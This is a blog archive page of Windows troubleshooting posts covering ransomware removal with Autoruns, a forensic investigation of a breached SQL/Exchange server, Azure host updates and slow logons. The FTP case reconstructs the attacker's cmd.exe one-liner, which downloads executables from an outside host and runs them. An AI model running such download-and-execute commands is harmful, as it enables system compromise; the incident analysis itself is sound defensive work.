Mark's Blog
https://blogs.technet.microsoft.com/markrussinovich
Mark Russinovich's technical blog covering topics such as Windows troubleshooting, technologies and security.

Hunting Down and Killing Ransomware
January 7, 2013
https://blogs.technet.microsoft.com/markrussinovich/2013/01/02/hunting-down-and-killing-ransomware/

Scareware, a type of malware that mimics antimalware software, has been around for a decade and shows no sign of going away. The goal of scareware is to fool a user into thinking that their computer is heavily infected with malware and that the most convenient way to clean the system is to pay for the full version of the scareware software that graciously brought the infection to their attention. I wrote about it back in 2006 in my The Antispyware Conspiracy blog post, and the fake antimalware of today doesn’t look much different than it did back then, often delivered as kits that franchisees can skin with their own logos and themes. There’s even one labeled Sysinternals Antivirus:

A change that’s been occurring in the scareware industry over the last few years is that most scareware today also classifies as ransomware. The examples in my 2006 blog post merely nagged you that your system was infected, but otherwise let you continue to use the computer. Today’s scareware prevents you from running security and diagnostic software at the minimum, and often prevents you from executing any software at all. Without advanced malware-cleaning skills, a system infected with ransomware is good for nothing except giving in to the blackmailer’s demand to pay.

In this blog post I describe how different variants of ransomware lock the user out of their computer, how they persist across reboots, and how you can use Sysinternals Autoruns to hunt down and kill most current ransomware variants from an infected system.

The Prey

Before you can hunt effectively, you must first understand your prey. Fake-antimalware-type scareware, by far the most common type of ransomware, usually aims at being constantly annoying rather than completely locking a user out of their system. The prevalent strains use built-in lists of executables to determine what they will block, which usually include most antimalware and even the primary Sysinternals tools. They customarily let the user run most built-in software like Paint, but sometimes will block some of those too. When they block an executable they display a dialog falsely claiming that it was blocked because of an infection:

But malware has gotten even more aggressive in the last couple of years, not even pretending to be anything other than the ransomware it is. Take this example, which completely takes over a computer, blocking all access to anything except its own window, and demands an unlock code to regain the use of the system, which the user must purchase by calling the specified number (in this case one with a Russian country code):

Here’s one that similarly takes over the computer, but forces the user to do some online shopping to redeem the computer’s use (I haven’t investigated to see what amount of purchasing returns the use of the computer):

And here’s one that I suppose can also be called scareware, because it informs the user that their system harbors child pornography, something that would be horrifying news to most people. The distributor must believe that the fear of having to defend against charges of child pornography will dissuade victims from going to the authorities and convince them to instead pay the requested fee.

Some ransomware goes so far as to present itself as official government software. Here’s one supposedly from the French police that informs users that pirated movies reside on their computer and they must pay a fine as punishment:

As far as how these malefactors lock users out of their computer, there are many different techniques in practice. One commonly used by the fake-antimalware variety, like the Security Shield malware shown in an earlier screenshot, is to block the execution of other programs by simply watching for the appearance of new windows and forcibly terminating the owning process. Another technique, used by the online shopping ransomware example pictured above, is to hide any windows not belonging to the malware, thus technically enabling you to launch other software but not to interact with it. A similar approach is for malware to create a full-screen window and to constantly raise the window to the top of the window order, obscuring all other application windows behind it. I’ve also seen more devious tricks, like one sample that creates a new desktop and switches to it, similar to the way Sysinternals Desktops works – but while your programs are still running, you can’t switch to their desktop to interact with them.

Finding a Position from Which to Hunt

The first step for cleaning a system of the tenacious grip of ransomware is to find a place from which to perform the cleaning. All of the lock-out techniques make it impossible to interact with a system from the infected account, which is typically its primary administrative account. If the victim system has another administrative account and the malware hasn’t hijacked a global autostart location that infects all accounts, then you’ve gotten lucky and can clean from there.

Unfortunately, most systems have only one administrative account, removing the alternate-account option. The fallback is to try Safe Mode, which you can reach by pressing F8 during the boot process (reaching Safe Mode is a little more difficult in Windows 8). Most ransomware configures itself to automatically start by creating an entry in the Run or RunOnce key of HKCU\Software\Microsoft\Windows\CurrentVersion (or the HKLM variants), which Safe Mode doesn’t process, so Safe Mode can provide an effective platform from which to clean such malware. A growing number of ransomware samples modify HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell (or the HKLM location), however, which both Safe Mode and Safe Mode with Networking execute. Safe Mode with Command Prompt overrides the registry shell selection, so it circumvents the startup of the majority of today’s ransomware and is the next fallback position:
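The relationships above can be sketched in code. Below is an illustrative Python model (not an exhaustive list of autostart locations, and the mode names are my own shorthand, not official Windows terminology) of which boot modes process which of the registry locations just described:

```python
# Illustrative model of the behavior described above: which boot modes
# process each common ransomware autostart location.
AUTOSTART_LOCATIONS = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run":
        {"normal"},
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce":
        {"normal"},
    r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell":
        {"normal", "safe_mode", "safe_mode_networking"},
}

ALL_MODES = {"normal", "safe_mode", "safe_mode_networking", "safe_mode_cmd"}

def modes_that_circumvent(location):
    """Return the boot modes in which the given autostart location is
    NOT processed, i.e. modes that offer a safe platform for cleaning."""
    return ALL_MODES - AUTOSTART_LOCATIONS[location]

print(modes_that_circumvent(
    r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"))
# {'safe_mode_cmd'}
```

Under this model, only Safe Mode with Command Prompt circumvents a hijacked Winlogon Shell value, which matches the fallback ordering described above.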

Finally, if the malware is active even in Safe Mode with Command Prompt, you’ll have no choice but to go offline hunting in an alternate Windows installation. There are a number of options available. If you have Windows 8, creating a Windows To Go installation is ideal, since it is literally a full version of Windows. An alternative is to boot the Windows Setup media and press Shift+F10 to open a command prompt when you reach the first graphical screen:

You won’t have access to Internet Explorer and many applications won’t work properly in Windows Setup’s stripped-down environment, but you can run many of the Sysinternals tools. Finally, you can create Windows Preinstallation Environment (WinPE) boot media, which provides an environment similar to that of Windows Setup and is what the Microsoft Diagnostic and Repair Toolkit (MSDaRT) uses.

The Hunt

Now that you’ve found your hunting spot, it’s time to select your weapon. The easiest to use is of course off-the-shelf antimalware software. If you’re logged in to an alternate account or Safe Mode you can use standard online-scanning products, many of which are free, like Microsoft’s own Windows Defender. If you’re booted into a different Windows installation, however, then you’ll need to use an offline scanner, like Windows Defender Offline. If the antimalware engine isn’t able to detect or clean the infection, you’ll have to turn to a more precise and manual weapon.

One utility that enables you to rip the malware’s tendrils off the system is Sysinternals Autoruns. Autoruns is aware of over a hundred places where malware can configure itself to automatically start when Windows boots, a user logs in, or a specific built-in application launches. The way you need to run it depends on what environment you’re hunting from, but in all cases you should run it with administrative rights. Also, Autoruns automatically starts scanning when you start it; you should abort the initial scan by pressing the Esc key, then open the Filter dialog and select the options to verify signatures and to hide all Microsoft entries so that malware will appear more prominently, and restart the scan:

If you’re logged into a different account from the one that’s infected, then you need to point Autoruns at the infected account by selecting it from the User menu. In this example Autoruns is running in the Fred account, but the one that’s infected is Abby, so I’ve selected the Abby profile:

If you’ve booted into a different operating system then you need to use Autoruns offline support, which requires you to specify the root of the target Windows installation and the target user profile. Open the Analyze Offline System dialog from the File menu and enter the appropriate directories:

Of course, since Autoruns shows just autostart configuration and not running processes, some of these attributes are not relevant. Nevertheless, I’ve found in my examination of several dozen variants of current ransomware that all of them satisfy more than one, most commonly by not having a description or company name and by having a random or suspicious file name.

One downside to offline scanning is that signature verification doesn’t work properly. This is because Windows uses catalog signing, as opposed to direct image signing, which stores signatures in separate files rather than in the images themselves. Autoruns doesn’t process offline catalog files (I’ll probably add that support in the near future), so all catalog-signed images will show up as unverified and highlighted in red. Since most malware doesn’t pretend to be from Microsoft, you can try an initial scan with the option to verify code signatures unchecked. Here’s the result of an offline scan, with signature verification disabled, of a ransomware infection that takes over two autostart locations – see if you can spot them:

If you are unsure about an image, you can try uploading it to Virustotal.com for analysis by around 40 of the most popular antivirus engines, searching the Web for information, and looking at the strings embedded in the file using the Sysinternals Strings utility.
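For readers curious about what a strings scan actually does, here is a minimal Python sketch in the spirit of the Sysinternals Strings utility. It is ASCII-only (the real tool also scans UTF-16), and the sample bytes and names below are made up for illustration:

```python
import re

def extract_strings(data, min_len=4):
    """Return printable-ASCII runs of at least min_len bytes, in the
    spirit of the Sysinternals Strings utility (ASCII-only sketch)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]

# Made-up bytes standing in for a suspicious executable:
sample = b"\x00\x01pay4unlock.exe\x00\xffab\x00http://evil.example\x02"
print(extract_strings(sample))  # ['pay4unlock.exe', 'http://evil.example']
```

Embedded URLs, file names, and taunting messages surfaced this way are often enough to confirm that an unsigned image is malware.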

The Kill

Once you’ve determined which entries belong to malware, the next step is to disable them by deselecting the checkboxes of their autostart entries. This will allow you to re-enable the entries later if you discover you made a mistake. It doesn’t hurt to also move the malware files and any other suspicious files in the directory of the ones configured to autostart to another directory. Moving all the files makes it more likely that you’ll break the malware even if you miss an autostart location.
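The move-rather-than-delete step can be sketched as follows; the file name `xk3b99.exe` and the directory layout are hypothetical stand-ins for a real infection:

```python
import shutil
import tempfile
from pathlib import Path

def quarantine(files, quarantine_dir):
    """Move suspect files out of their directory rather than deleting
    them, so a mistake can be undone by moving them back."""
    qdir = Path(quarantine_dir)
    qdir.mkdir(parents=True, exist_ok=True)
    moved = []
    for f in files:
        dest = qdir / Path(f).name
        shutil.move(str(f), str(dest))
        moved.append(dest)
    return moved

# Demonstration against a scratch file in a temporary directory:
work = Path(tempfile.mkdtemp())
suspect = work / "xk3b99.exe"          # hypothetical malware file name
suspect.write_bytes(b"MZ")
moved = quarantine([suspect], work / "quarantine")
print(moved[0].name)  # xk3b99.exe
```

Because the files are only relocated, re-enabling a mistakenly disabled entry and restoring its file is straightforward.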

Next, check to see if your prey is dead by booting the system and logging into the account that was infected. If you still see signs of an infection, you might have missed something in your Autoruns analysis, so repeat the steps. If that doesn’t yield success, the malware may be a more sophisticated strain, for example one that infects the Master Boot Record or that infects the system in some other unconventional way to persist across reboots. There is also ransomware that goes further and encrypts files, but it is relatively rare. Fortunately, ransomware authors are lazy and generally don’t need to go to such lengths to be effective, so a quick analysis with Autoruns is virtually always lethal.

Happy hunting!

If you liked this post, you’ll like my two highly-acclaimed cyberthriller novels, Zero Day and Trojan Horse. Watch their exciting video trailers, read sample chapters and find ordering information on my personal site at http://russinovich.com

The Case of the Unexplained FTP Connections
October 30, 2012
https://blogs.technet.microsoft.com/markrussinovich/2012/10/28/the-case-of-the-unexplained-ftp-connections/

A key part of any cybersecurity plan is “continuous monitoring”: enabling auditing and monitoring throughout a network environment and configuring automated analysis of the resulting logs to identify anomalous behaviors that merit investigation. This is part of the new “assumed breach” mentality that recognizes no system is 100% secure. Unfortunately, the company at the heart of this case didn’t have a comprehensive monitoring system, so it had been breached for some time before updated antimalware signatures cleaned the infection and brought the breach to its attention. Besides highlighting just how weak cybersecurity is at many companies, this case demonstrates several Sysinternals Process Monitor features, including the Process Tree dialog and one feature many people aren’t aware of: Process Monitor’s ability to monitor network activity.

The case opened when a network administrator at a South African company contacted Microsoft Services Premier Support and reported that their corporate Exchange server, running on Windows Server 2008 R2, appeared to be making outbound FTP connections. He noticed this only because the company’s installation of Microsoft Forefront Endpoint Protection (FEP) alerted him that it had cleaned a piece of malware it found on the server. Concerned that the network might still be compromised despite the fact that FEP claimed the system was malware-free, he examined the company’s perimeter firewall logs. To his horror, he discovered FTP connections that numbered in the hundreds per day and dated back several weeks. Instead of attempting a forensic examination on his own, he called on Microsoft’s security consulting team, which specializes in helping customers clean up after an attack.

The Microsoft support engineer assigned the case began by capturing a five-minute Process Monitor trace of the Exchange server. After stopping the trace he opened the Process Tree dialog (under the Tools menu), which shows the parent-child relationships of all the processes that existed at any point in the current trace. He quickly found that around 20 FTP processes had been launched during the collection, each of them short-lived, except for one, which was still active (process 7324 below):

The engineer looked at the command lines for the FTP processes by selecting them in the tree so that their details appeared at the bottom of the Process Tree dialog. The command lines for half of them bizarrely included just the “-?” argument, which simply brings up FTP help:

The other half were more interesting, including “-i” and “-s” switches:

The -i switch has FTP turn off prompting for multiple file transfers, and -s directs FTP to execute the FTP commands listed in a file, in this case a file named “j”. Setting out to discover what the file “j” contained, he clicked the “Include Process” button at the bottom of the Process Tree dialog so that he could find the process’s file events:

He searched the resulting filtered trace for “j” and found the file’s location in several of the events:

He navigated to the C:\Windows\System32\i4333 directory, but the “j” file was gone. That being a dead end, he turned his attention to the FTP process’s parent, Cmd.exe, and looked at its command line. The line was too long and convoluted to easily understand:

He selected it, pressed Ctrl+C to copy it to the clipboard, pasted it into Notepad, and decomposed it into its constituent commands, each of which was separated by a “&”. The result looked like this:

The first instruction has the command prompt create a directory named i4333 and then start writing the contents of the “j” file. The commands it writes into “j” instruct FTP to connect to NUXZb.in.into4.info, log in with the user name “New” and the password “123”, and then download all the files on the FTP server that end in “.exe”. After FTP has processed the file, the command prompt deletes “j” and then creates a batch file that executes the downloaded files, first using the shell to launch them (“start”) and then the command prompt.
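The decomposition step is simple to mimic. Below is a Python sketch that splits a cmd.exe one-liner on “&”; the command line itself is a hypothetical reconstruction in the spirit of the attacker’s script (the exact string isn’t reproduced here), though the host name, user name, and password are the ones described above:

```python
def decompose_cmd_line(cmd):
    """Split a cmd.exe one-liner on '&' into its constituent commands.
    Simplified sketch: ignores quoting, '&&', and escaping, which is
    enough for a script of the kind described above."""
    return [part.strip() for part in cmd.split("&") if part.strip()]

# Hypothetical reconstruction of the attacker's one-liner; only the
# host, user name, and password come from the case itself.
line = ("md i4333& echo open NUXZb.in.into4.info>j& echo New>>j& "
        "echo 123>>j& echo mget *.exe>>j& ftp -i -s:j& del j")
for command in decompose_cmd_line(line):
    print(command)
```

Breaking the line apart this way makes each step of the download-and-execute sequence readable on its own.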

A quick detour to Whois showed the engineer that the NUXZb hostname was issued by Protected Name Services and didn’t reveal any useful information. The engineer toggled off Process Monitor’s network name resolution and found the outbound FTP connection in the trace to see the IP address the name had resolved to:

An IP address location lookup on the Web pinpointed the IP address at an ISP in Chicago (the name now resolves to a different IP address), so he concluded the connection was to a server that was also compromised or one the attacker had hosted at the ISP. Finished analyzing the command line, he looked at the contents of the resulting script, D.bat, which was still in the directory and contained this single command:

Not coincidentally, 134.exe was the executable Forefront had flagged as a remote access Trojan (RAT) in the alerts that the administrator first responded to. The script could therefore not find it, making it seem that the attack – or at least this part of it – had been neutralized by FEP. It also implied that the attack was automated and stuck in a loop trying to activate.

The engineer next set out to determine how the command-prompt processes were being launched. Looking at their parent processes in the process tree, he learned they were all launched from Sqlserver.exe:

This obviously wasn’t a good sign, but it wasn’t the worst of it: examining SQL Server’s network activity in the trace, he saw many incoming connections:

Lookups of the IP address locations placed them in China, Tunisia, Taiwan, and Morocco:

The SQL Server was being used by an attacker or multiple attackers from around the world in countries known for being cybercriminal safe havens. It was clearly time to flatten the server, but before calling the administrator to give him the bad news and advise him to immediately disconnect the server from the network, he thought he’d spend a few minutes examining the security of the SQL Server. Understanding what had led to the compromise could help the company avoid being compromised the same way again.

He launched a Microsoft support batch file that checks various SQL Server security settings. The tool ran for a few seconds and then printed its discouraging results: the server had an administrator account with a blank password, was configured for mixed-mode authentication, and allowed stored procedures to launch command prompts via the enablement of the “xp_cmdshell” feature:

That meant that anyone on the Internet could log on to the server without a password and execute programs – like FTP – to infect the system with their own tools.
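A toy version of such a configuration audit might look like the Python below. The setting names are invented for this sketch, and the real Microsoft batch file checks far more than these three items:

```python
def audit_sql_config(config):
    """Flag the three risky settings the support batch file reported.
    Setting names here are illustrative, not real SQL Server keys."""
    findings = []
    if config.get("sa_password") == "":
        findings.append("administrator account has a blank password")
    if config.get("auth_mode") == "mixed":
        findings.append("mixed-mode authentication enabled")
    if config.get("xp_cmdshell"):
        findings.append("xp_cmdshell enabled (stored procedures "
                        "can launch command prompts)")
    return findings

# The configuration the engineer found on the compromised server:
compromised = {"sa_password": "", "auth_mode": "mixed", "xp_cmdshell": True}
for finding in audit_sql_config(compromised):
    print(finding)
```

Any one of the three findings is serious on an Internet-facing server; together they amount to an open invitation.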

With the help of Process Monitor and some discussion with the company’s administrator, the support engineer had a solid theory for what had happened: an administrator at the company had installed SQL Server on the company’s Exchange server several weeks prior to the incident. Not realizing the server was on the perimeter, they had opened the SQL Server’s port in the local firewall, left it with a blank admin account, and enabled xp_cmdshell. It goes without saying that even if the server wasn’t on the Internet, that configuration leaves a server without any network security. Not long after, automated malware scanning the Internet for exposed targets had stumbled across the open SQL port, infected the server with malware, and likely enlisted it in a Botnet. FEP signatures for the new malware variant were delivered to the server some time later and removed the infection. The Botnet-enlisting malware was still trying to reintegrate the server when the case with Microsoft support was opened. While the company can’t know how much – if any – of its corporate data was pilfered during the infection, this was a very loud and clear wakeup call.

Windows Azure Host Updates: Why, When, and How
August 22, 2012
https://blogs.technet.microsoft.com/markrussinovich/2012/08/22/windows-azure-host-updates-why-when-and-how/

Windows Azure’s compute platform, which includes Web Roles, Worker Roles, and Virtual Machines, is based on machine virtualization. It’s the deep access to the underlying operating system that makes Windows Azure’s Platform-as-a-Service (PaaS) uniquely compatible with many existing software components, runtimes and languages, and of course, without that deep access – including the ability to bring your own operating system images – Windows Azure’s Virtual Machines couldn’t be classified as Infrastructure-as-a-Service (IaaS).

The Host OS and Host Agent

Machine virtualization of course means that your code – whether it’s deployed in a PaaS Worker Role or an IaaS Virtual Machine – executes in a Windows Server Hyper-V virtual machine. Every Windows Azure server (also called a Physical Node or Host) hosts one or more virtual machines, called “instances”, scheduling them on physical CPU cores, assigning them dedicated RAM, and granting and controlling access to local disk and network I/O.

The diagram below shows a simplified view of a server’s software architecture. The host partition (also called the root partition) runs the Server Core profile of Windows Server as the host OS and you can see the only difference between the diagram and a standard Hyper-V architecture diagram is the presence of the Windows Azure Fabric Controller (FC) host agent (HA) in the host partition and the Guest Agents (GA) in the guest partitions. The FC is the brain of the Windows Azure compute platform and the HA is its proxy, integrating servers into the platform so that the FC can deploy, monitor and manage the virtual machines that define Windows Azure Cloud Services. Only PaaS roles have GAs, which are the FC’s proxy for providing runtime support for and monitoring the health of the roles.

Reasons for Host Updates

Ensuring that Windows Azure provides a reliable, efficient and secure platform for applications requires patching the host OS and HA with security, reliability and performance updates. As you would guess based on how often your own installations of Windows get rebooted by Windows Update, we deploy updates to the host OS approximately once per month. The HA consists of multiple subcomponents, such as the Network Agent (NA) that manages virtual machine VLANs and the Virtual Machine virtual disk driver that connects Virtual Machine disks to the blobs containing their data in Windows Azure Storage. We therefore update the HA and its subcomponents at different intervals, depending on when a fix or new functionality is ready.

The steps we can take to deploy an update depend on the type of update. For example, almost all HA-related updates apply without rebooting the server. Windows OS updates, though, almost always have at least one patch, and usually several, that necessitate a reboot. We therefore have the FC “stage” a new version of the OS, which we deploy as a VHD, on each server and then the FC instructs the HAs to reboot their servers into the new image.

PaaS Update Orchestration

A key attribute of Windows Azure is its PaaS scale-out compute model. When you use one of the stateless virtual machine types in your Cloud Service, whether Web or Worker, you can easily scale the role up and down just by updating the instance count of the role in your Cloud Service’s configuration. The FC automatically does all the work to create new virtual machines when you scale out and to shut down and remove virtual machines when you scale down.

What makes Windows Azure’s scale-out model unique, though, is the fact that it makes high-availability a core part of the model. The FC defines a concept called Update Domains (UDs) that it uses to ensure a role is available throughout planned updates that cause instances to restart, whether they are updates to the role applied by the owner of the Cloud Service, like a role code update, or updates to the host that involve a server reboot, like a host OS update. The FC’s guarantee is that no planned update will cause instances from different UDs to be offline at the same time. A role has five UDs by default, though a Cloud Service can request up to 20 UDs in its service definition file. The figure below shows how the FC spreads the instances of a Cloud Service’s two roles across three UDs.
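A minimal sketch of the UD-spreading idea follows. It uses simple round-robin assignment; Windows Azure’s real placement algorithm is more sophisticated, but the guarantee it illustrates is the same – instances land in different UDs until every UD is in use:

```python
def assign_update_domains(instance_count, ud_count=5):
    """Round-robin a role's instances across update domains so that no
    two instances share a UD until every UD has been used."""
    return {i: i % ud_count for i in range(instance_count)}

uds = assign_update_domains(2)   # a two-instance role, default five UDs
print(uds)  # {0: 0, 1: 1} - one instance per UD, so a planned update
            # never takes both offline at once
```

With five default UDs, a role needs more than five instances before any two of them share an update domain.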

Role instances can call runtime APIs to determine their UD and the portal also shows the mapping of role instances to UDs. Here’s a cloud service with two roles having two instances each, so each UD has one instance from each role:

The behavior of the FC with respect to UDs differs for Cloud Service updates and host updates. When the update is one applied by a Cloud Service, the FC updates all the instances of each UD in turn. It moves to a subsequent UD only when all the instances of the previous UD have restarted and reported themselves healthy to the GA, or when the Cloud Service owner asks the FC via a service management API to move to the next UD.

Instead of proceeding one UD at a time, the order and number of instances of a role that get rebooted concurrently during host updates can vary. That’s because the placement of instances on servers can prevent the FC from rebooting the servers on which all instances of a UD are hosted at the same time, or even in UD-order. Consider the allocation of instances to servers depicted in the diagram below. Instance 1 of Service A’s role is on server 1 and instance 2 is on server 2, whereas Service B’s instances are placed oppositely. No matter what order the FC reboots the servers, one service will have its instances restarted in an order that’s the reverse of their UDs. The allocation shown is relatively rare since the FC allocation algorithm optimizes by attempting to place instances from the same UD – regardless of what service they belong to – on the same server, but it’s a valid allocation because the FC can reboot the servers without violating the promise that it not cause instances of different UDs of the same role (of a single service) to be offline at the same time.

Another difference between host updates and Cloud Service updates is that when the update is to the host, the FC must ensure that one instance doesn’t indefinitely stall the forward progress of server updates across the datacenter. The FC therefore allots instances at most five minutes to shut down before proceeding with a reboot of the server into the new host OS, and at most fifteen minutes for a role instance to report that it’s healthy after it restarts. It takes a few minutes to reboot the host, then restart the VMs, GAs and finally the role instance code, so an instance is typically offline anywhere between fifteen and thirty minutes, depending on how long it and any other instances sharing the server take to shut down, as well as how long it takes to restart. More details on the expected state changes for Web and Worker roles during a host OS update can be found here. Note that for PaaS services the FC manages OS servicing for guests as well, so a host OS update is typically followed by a corresponding guest OS update (for PaaS services that have opted into updates), which is orchestrated by UD like other cloud service updates.
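The stated limits make the offline window easy to bound. A back-of-envelope sketch, where the reboot time is an assumed placeholder for the “few minutes” mentioned above:

```python
SHUTDOWN_LIMIT = 5   # minutes the FC allots for an instance to shut down
HEALTHY_LIMIT = 15   # minutes allotted to report healthy after restart

def offline_window(shutdown_minutes, reboot_minutes, restart_minutes):
    """Bound the instance-offline window: shutdown and restart time are
    capped at the FC's limits; reboot_minutes is an assumed figure for
    rebooting the host and restarting the VM and GA."""
    return (min(shutdown_minutes, SHUTDOWN_LIMIT)
            + reboot_minutes
            + min(restart_minutes, HEALTHY_LIMIT))

print(offline_window(5, 5, 15))   # 25 - within the 15-to-30 minute range
print(offline_window(60, 5, 60))  # 25 - a stalled instance can't extend it
```

The caps are what keep a single misbehaving instance from stalling the datacenter-wide rollout.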

IaaS and Host Updates

The preceding discussion has been in the context of PaaS roles, which automatically get the benefits of UDs as they scale out. Virtual Machines, on the other hand, are essentially single-instance roles that have no scale-out capability. An important goal of the IaaS feature release was to enable Virtual Machines also to achieve high availability in the face of host updates and hardware failures, and the Availability Sets feature does just that. You can add Virtual Machines to Availability Sets using PowerShell commands or the Windows Azure management portal. Here’s an example cloud service with virtual machines assigned to an availability set:

Just like roles, Availability Sets have five UDs by default and support up to twenty. The FC spreads instances assigned to an Availability Set across UDs, as shown in the figure below. This allows customers to deploy Virtual Machines designed for high availability, for example two Virtual Machines configured for SQL Server mirroring, to an Availability Set, which ensures that a host update will cause a reboot of only one half of the mirror at a time as described here (I don’t discuss it here, but the FC also uses a feature called Fault Domains to automatically spread instances of roles and Availability Sets across servers so that any single hardware failure in the datacenter will affect at most half the instances).
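The fault-domain guarantee can be sketched the same way as UDs; the instance names below are hypothetical:

```python
def spread_across_fault_domains(instances, fault_domains=2):
    """Alternate an availability set's instances across fault domains so
    that a single hardware failure affects at most half of them. A
    sketch only; real placement involves many more constraints."""
    return {name: i % fault_domains for i, name in enumerate(instances)}

placement = spread_across_fault_domains(["sql-mirror-1", "sql-mirror-2"])
print(placement)  # {'sql-mirror-1': 0, 'sql-mirror-2': 1}
```

For the SQL Server mirroring example above, this placement means neither a host update nor a single hardware failure can take down both halves of the mirror at once.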

More Information

You can find more information about Update Domains, Fault Domains and Availability Sets in my Windows Azure conference sessions, recordings of which you can find on my Mark’s Webcasts page here. Windows Azure MSDN documentation describes host OS updates here and the service definition schema for Update Domains here.

The Case of the Veeerrry Slow Logons
July 2, 2012
https://blogs.technet.microsoft.com/markrussinovich/2012/07/01/the-case-of-the-veeerrry-slow-logons/

This case is my favorite kind of case, one where I use my own tools to solve a problem affecting me personally. The problem at the root of it is also one you might run into, especially if you travel, and it demonstrates the use of some Process Monitor features that many people aren’t aware of, making it an ideal troubleshooting example to document and share.

The story unfolds the week before last, when I made a trip to Orlando to speak at Microsoft’s TechEd North America conference. While I was there I began to experience five-minute black-screen delays when I logged on to my laptop’s Windows 7 installation:

I’d typically chalk up an isolated delay like this to networking issues, common at conferences and with hotel WiFi, but I hit the issue consistently switching between the laptop’s Windows 8 installation, where I was doing testing and presentations, and the Windows 7 installation, where I have my development tools. Being locked out of your computer for that long is annoying to say the least.

The first time I ran into the black screen I forcibly rebooted the system after a couple of minutes because I thought it had hung, but when the delay happened a second time I was forced to wait it out and face the disappointing reality that my system was sick. When I logged off and back on again without a reboot in between, though, I didn’t hit the delay. It only occurred when logging on after a reboot, which I was doing as I switched between Windows 7 and Windows 8. What made the situation especially frustrating was that whenever I rebooted I was always in a hurry to get ready for my next presentation, so had to suffer with the inconvenience for several days before I finally had the opportunity to investigate.

Once I had a few spare moments, I launched Sysinternals Autoruns, an advanced autostart management utility, to disable any auto-starting images that were located on network shares. I knew from previous executions of Autoruns on the laptop that Microsoft IT configures several scheduled tasks to execute batch files that reside on corporate network shares, so I suspected that timeouts trying to launch them were to blame:

I logged off and logged back on with fingers crossed, but the delay was still there. Next, I tried logging into a local account to see if this was a machine-wide problem or one affecting just my profile. No delay. That was a positive sign since it meant that whatever the issue was, it would probably be relatively easy to fix once identified.

My goal now was to determine what was holding up the switch to the desktop. I had to somehow get visibility into what was going on during a logon immediately following a boot. The way that immediately jumped to mind as the easiest was to use Sysinternals Process Monitor to capture a trace of the boot process. Process Monitor, a tool that monitors system-wide file system, registry, process, DLL and network operations, has the ability to capture activity from very early in the boot, stopping its capture only when the system shuts down or you run the Process Monitor user interface. I selected the boot logging entry from the Options menu and opened the boot logging dialog:

The dialog lets you direct Process Monitor to collect profiling events while it’s monitoring the boot, which are periodic samples of thread stacks. I enabled one-second profiling, hoping that even if I didn’t spot operations that explained the delay, I could get a clue from the stacks of the threads that were active just before or during the delay.

After I rebooted, I logged on, waited for five minutes looking at a black screen, then finally got to my desktop, where I ran Process Monitor again and saved the boot log. Instead of scanning the several million events that had been captured, which would have been like looking for a needle in a haystack, I used this Process Monitor filter to look for operations that took more than one second, and hence might have caused the slowdown:
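The same “longer than one second” filter can also be applied offline: Process Monitor can save a capture as CSV, and a short script can then sift it. This is a sketch, not Process Monitor’s own mechanism; the column names below match a typical export with the Duration column enabled, and the sample rows are invented for illustration.

```python
import csv
import io

# A hypothetical Process Monitor CSV export; real exports have these columns
# when the Duration column is enabled (Options > Select Columns).
sample = io.StringIO(
    '"Time of Day","Process Name","Operation","Path","Duration"\n'
    '"5:01:02.1","Winlogon.exe","RegQueryValue","HKLM\\...","0.0000051"\n'
    '"5:01:03.4","Winlogon.exe","CreateFile","\\\\server\\share","4.8210000"\n'
)

def slow_events(csv_file, threshold=1.0):
    """Yield events whose Duration (in seconds) exceeds the threshold."""
    for row in csv.DictReader(csv_file):
        if float(row["Duration"]) > threshold:
            yield row

hits = list(slow_events(sample))
print(len(hits), hits[0]["Operation"])  # → 1 CreateFile
```

This mirrors the in-GUI filter: anything surviving the threshold is a candidate cause of the delay.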

Wondering if perhaps the sequence of processes starting during the logon might reveal something, I opened the Process Tree dialog from the Tools menu. The dialog shows the parent-child relationships of all the processes active during a capture, which in the case of a boot trace means all the processes that executed during the boot and logon process. Focusing my attention on Winlogon.exe, the interactive logon manager, I noticed that a process named Atbroker.exe launched around the time I entered my credentials, and then Userinit.exe executed at the time my desktop finally appeared:

The key to solving the mystery lay in the long pause in between. I knew that Logonui.exe simply displays the logon user interface and that Atbroker.exe is just a helper for transitioning from the logon user interface to a user session, which ruled them out, at least initially. The black screen disappeared when Userinit.exe had started, so Userinit’s parent process, Winlogon.exe, was the remaining suspect. I set a filter to include just events from Winlogon.exe and added the Relative Time column to easily see when events occurred relative to the start of the boot. When I looked at the resulting items I could easily see the delay was actually about six minutes, but there was no activity in that time period to point me at a cause:

Profiling events are excluded by default, so I clicked on the profile event filter button in the toolbar to include them, hoping that they might offer some insight:

In order to minimize log file sizes, Process Monitor’s profiling only captures a thread’s stack if the thread has executed since the last time it was sampled. I was therefore expecting to have to look at the thread profile events at the start of the delay, but my eye was drawn to a pattern of the same four threads sampled every second throughout the entire black-screen period:

I was fairly certain that whatever thread was holding things up had executed some function at the beginning of the interval and was dormant throughout, so was skeptical that any of these active threads were related to the issue, but it was worth spending a few seconds to look at them. I opened the event properties dialog for one of the samples by double-clicking on it and switched to its Stack page, on the off chance that the names of the functions on the stack had an answer.

When I first run Process Monitor on a system I configure it to pull symbols for Windows images from the Microsoft public symbol server using the Debugging Tools for Windows debug engine DLL, so I can see descriptive function names in the stack frames of Windows executables, rather than just file offsets:

The first thread’s stack identified the thread as a core Winlogon “state machine” thread waiting for some unknown notification, yielding no clues:

The next thread’s stack was just as unenlightening, showing the thread to be a generic worker thread:

The stack of the third thread was much more interesting. It was many frames deep, including calls into functions of the Multiple UNC Provider (MUP) and Distributed File System Client (DFSC) drivers, both related to accessing file servers:

I scrolled down to see the frames higher on the stack and the name of one of the functions, WLGeneric_ActivationAndNotifyStartShell_Execute, pretty much confirmed the thread to be the one responsible for the problem, since it implied that it was supposed to start the desktop shell:

The next frame’s function, WNetRestoreAllConnectionsW, combined with the deeper calls into file server functions, led me to conclude that Winlogon was trying to restore file server drive letter mappings before proceeding to launch my shell and give me access to the desktop. I quickly opened Explorer, recalling that I had two drives mapped to network shares hosted on computers inside the Microsoft network, one to my development system and another to the internal Sysinternals share where I publish pre-release versions of the tools. While at the conference I was not on the intranet, so Winlogon was unable to reconnect them during the logon and was eventually – after many minutes – giving up:

